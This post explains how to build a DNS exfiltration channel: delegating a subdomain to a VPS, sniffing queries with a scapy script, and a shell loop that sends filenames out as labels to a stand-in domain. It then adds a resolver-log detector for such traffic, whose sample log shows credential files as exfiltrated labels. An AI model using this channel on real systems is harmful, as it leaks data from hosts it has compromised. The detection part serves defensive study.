In order for you to get a basic DNS exfil setup to work you'll need a couple of things:
- A VPS to sniff the DNS queries
- A domain to direct the DNS queries to
The first step is to configure an NS record for a subdomain of your main domain. I simply created an NS record for e.domain.tld (replace domain.tld with your domain) and pointed it to the IP address of the VPS.
Now when someone requests somedata.e.domain.tld, the UDP request packet will go to the VPS IP. Run tshark/tcpdump to grab the request and prove whether or not you have command execution.
I partially wrote the following python script to just parse out the domain name being requested.

#!/usr/bin/env python2
from scapy.all import sniff
from scapy.layers.dns import DNSRR, DNS, DNSQR

def handlepkt(p):
    # thanks stackoverflow!
    # Print the queried name from a question, or the rdata from an answer.
    if p.haslayer(DNS):
        name = None
        if p.qdcount > 0 and isinstance(p.qd, DNSQR):
            name = p.qd.qname
        elif p.ancount > 0 and isinstance(p.an, DNSRR):
            name = p.an.rdata
        if name:
            print(name)

# The interface name must be a string; the BPF filter keeps only DNS traffic.
sniff(iface="eth0", filter="udp and port 53", store=0, prn=handlepkt)

Once your DNS settings are configured properly, just start the python sniffer and run something like
for i in *; do host $i.e.domain.tld; done
And watch the requests come in.
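From the defender's side, the pattern this setup produces (one client sending many distinct, often encoded, labels under a single delegated zone) is exactly what a resolver-log detection looks for. The script below is an added example, not code from this post; the log format, the sample lines, the zone depth and the thresholds are constructed assumptions.

```python
#!/usr/bin/env python3
"""Flag DNS-exfiltration-style query patterns in a resolver query log."""
import math
from collections import defaultdict

# Constructed sample log ("client qname"), one entry per query. The 10.0.0.5 host
# mirrors the post's loop: filenames (and hex-encoded data) as labels under e.domain.tld.
SAMPLE_LOG = """\
10.0.0.5 www.example.com
10.0.0.5 passwd.e.domain.tld
10.0.0.5 shadow.e.domain.tld
10.0.0.5 id_rsa.e.domain.tld
10.0.0.5 4a6f686e20446f65.e.domain.tld
10.0.0.5 746f702d7365637265742e747874.e.domain.tld
10.0.0.7 mail.example.com
10.0.0.7 www.example.com
"""

def shannon_entropy(s):
    """Bits per character of a label; hex/base32 payloads score higher than words."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def parent_zone(qname, labels=3):
    """Zone that receives the query, e.g. e.domain.tld (3 labels, an assumption).
    Names with no label in front of the zone carry no data and are skipped."""
    parts = qname.rstrip(".").lower().split(".")
    return ".".join(parts[-labels:]) if len(parts) > labels else None

def find_suspicious_zones(log, min_unique=4, min_entropy=3.0, min_encoded=2):
    """Return {"client -> zone": unique label count} for client/zone pairs that sent
    many distinct leading labels, or several high-entropy (encoded-looking) ones."""
    seen = defaultdict(set)           # (client, zone) -> distinct leading labels
    encoded = defaultdict(int)        # (client, zone) -> high-entropy label count
    for line in log.splitlines():
        client, qname = line.split()
        zone = parent_zone(qname)
        if zone is None:
            continue
        label = qname.split(".")[0]
        seen[(client, zone)].add(label)
        if shannon_entropy(label) >= min_entropy:
            encoded[(client, zone)] += 1
    return {f"{c} -> {z}": len(v) for (c, z), v in seen.items()
            if len(v) >= min_unique or encoded[(c, z)] >= min_encoded}

if __name__ == "__main__":
    print(find_suspicious_zones(SAMPLE_LOG))
```

Point it at real resolver or tshark output by replacing SAMPLE_LOG, and tune the zone depth and thresholds to your environment's baseline.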